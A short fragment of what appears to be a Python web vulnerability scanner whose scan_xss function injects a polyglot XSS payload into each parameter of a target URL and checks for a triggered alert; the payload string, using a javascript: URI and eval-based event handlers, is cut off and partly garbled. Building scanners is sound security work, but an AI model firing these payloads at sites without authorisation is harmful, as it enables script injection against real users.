#!/usr/bin/python # -*- coding: utf-8 -*- from flask import Flask, request, jsonify from ghost import Ghost import requests import datetime import re """scan_xss Description: injects a polyglot XSS vector into every parameter, then checks whether an alert was triggered Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - the parameter being modified """ def scan_xss(method, vulns, url, fuzz, cookie, useragent, data): #payload = 'javascript://\'/-->*/prompt(42)/*
' payload = 'jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)>" >
@gmail.com\'-->" >">/\'">